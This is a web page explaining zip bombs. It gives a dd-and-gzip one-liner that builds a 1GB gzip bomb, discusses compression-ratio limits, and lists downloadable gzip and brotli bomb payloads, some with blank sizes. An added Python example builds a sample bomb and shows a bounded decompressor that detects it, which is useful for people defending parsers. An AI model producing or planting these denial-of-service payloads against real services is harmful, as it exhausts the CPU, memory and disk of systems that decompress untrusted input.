zipbomb.me
what is a zip bomb?
A zip bomb is a denial-of-service payload: a small compressed file constructed so that it expands to an enormous size when decompressed. Any software that decompresses it without limits can be degraded or taken down by the expansion (CPU time spent inflating the stream, memory exhausted by buffering the output, disk filled by writing it out, and so on).
make your own zipbombs
Zip bombs are trivial to produce: pipe a long stream of identical bytes through a compressor, which reduces the whole run to a handful of back-references. For example, pass 1GB of '\x00' bytes to gzip (the -9 flag selects the highest compression level; bs=1GB is GNU dd notation for 10^9 bytes):
dd if=/dev/zero bs=1GB count=1 | gzip -9 > 1gb.gz
You can check the size of the output:
du -h 1gb.gz # compressed file size
gzip -d -k 1gb.gz -c | wc -c # count uncompressed bytes
compression ratios
A zip bomb author will usually want to maximize the ratio between uncompressed and compressed size, so that the payload fits through size-limited or bandwidth-constrained channels. As an example, the 1GB payload above gzips to roughly 948K as reported by du -h (kibibytes, so about 970,000 bytes), an expansion factor of just over 1000x. That is close to the ceiling for a single gzip stream: a deflate back-reference covers at most 258 bytes and costs at least two bits to encode, so the ratio cannot exceed roughly 1032:1 no matter what the input is. Larger ratios require something other than a single stream, such as nesting archives inside archives.
Not all compression algorithms are created equal. Some are tuned for particular inputs (brotli, for instance, ships a built-in dictionary of common web text, and other formats target images, video, or other media), and a better ratio may be achieved by feeding them input that mimics the structure they are optimized for.
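The same construction in Python, together with the check a consumer of untrusted gzip data actually wants: an added example, not code from zipbomb.me. It streams zeros through zlib's gzip mode (the equivalent of the dd | gzip -9 pipe above), reports the expansion factor, and then decompresses with a hard budget on produced bytes so the bomb is rejected early. The 4 MiB sample size, the function names and the 1 MiB budget are choices made for this example; scale SAMPLE_SIZE up to reproduce the 1GB figure.

```python
import zlib

# Constructed sample: 4 MiB of zeros (small enough to build in well under a
# second; raise this to 10**9 to reproduce the 1GB bomb from the shell example).
SAMPLE_SIZE = 4 * 1024 * 1024


def make_gzip_bomb(uncompressed_size: int, chunk: int = 1 << 20) -> bytes:
    """Compress `uncompressed_size` zero bytes into a gzip stream.

    Mirrors `dd if=/dev/zero | gzip -9`: zeros are fed to the compressor one
    chunk at a time, so the plaintext is never held in memory at once.
    """
    # level=9 is gzip -9; wbits=31 selects gzip framing (header plus
    # CRC32/ISIZE trailer) rather than a zlib or raw deflate stream.
    comp = zlib.compressobj(level=9, wbits=31)
    zeros = b"\x00" * chunk
    parts = []
    remaining = uncompressed_size
    while remaining > 0:
        n = min(chunk, remaining)
        parts.append(comp.compress(zeros[:n]))
        remaining -= n
    parts.append(comp.flush())
    return b"".join(parts)


def expansion_factor(compressed: bytes, uncompressed_size: int) -> float:
    """Uncompressed bytes per compressed byte (the ratio discussed above)."""
    return uncompressed_size / len(compressed)


class BombDetected(Exception):
    """Raised when decompression would exceed the caller's output budget."""


def bounded_gunzip(data: bytes, max_output: int, chunk: int = 1 << 16) -> bytes:
    """Decompress a gzip stream, refusing to produce more than max_output bytes.

    The budget is enforced on bytes actually produced, never on the ISIZE
    field in the gzip trailer: that field is attacker-controlled (and only
    32 bits wide), so it is useless as a safety check.
    """
    dec = zlib.decompressobj(wbits=31)
    out = bytearray()
    pending = data
    while not dec.eof:
        # max_length caps the output of this call; input that zlib did not
        # consume comes back in unconsumed_tail for the next iteration.
        piece = dec.decompress(pending, chunk)
        pending = dec.unconsumed_tail
        out += piece
        if len(out) > max_output:
            consumed = len(data) - len(pending)
            raise BombDetected(
                f"output exceeded {max_output} bytes after only {consumed} "
                f"of {len(data)} compressed bytes"
            )
        if not piece and not pending:
            # Nothing left to consume and no end-of-stream marker seen.
            raise ValueError("truncated gzip stream")
    return bytes(out)


SAMPLE_BOMB = make_gzip_bomb(SAMPLE_SIZE)

if __name__ == "__main__":
    print(f"{SAMPLE_SIZE} bytes -> {len(SAMPLE_BOMB)} bytes gzipped, "
          f"{expansion_factor(SAMPLE_BOMB, SAMPLE_SIZE):.0f}x expansion")
    try:
        bounded_gunzip(SAMPLE_BOMB, max_output=1024 * 1024)
    except BombDetected as err:
        print("rejected:", err)
```

The detector stops after at most one extra chunk beyond the budget, regardless of how large the declared or real plaintext is; the same pattern (streaming decompression with a byte budget) applies to zlib, raw deflate, and, with the corresponding library, brotli.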
available payloads
gzip bombs
brotli bombs
- 1gb.brotli ( compressed)
- 10gb.brotli ( compressed)
- 100gb.brotli (X compressed)
zipbomb.me by Austin Hartzheim is licensed under CC BY-NC-SA 4.0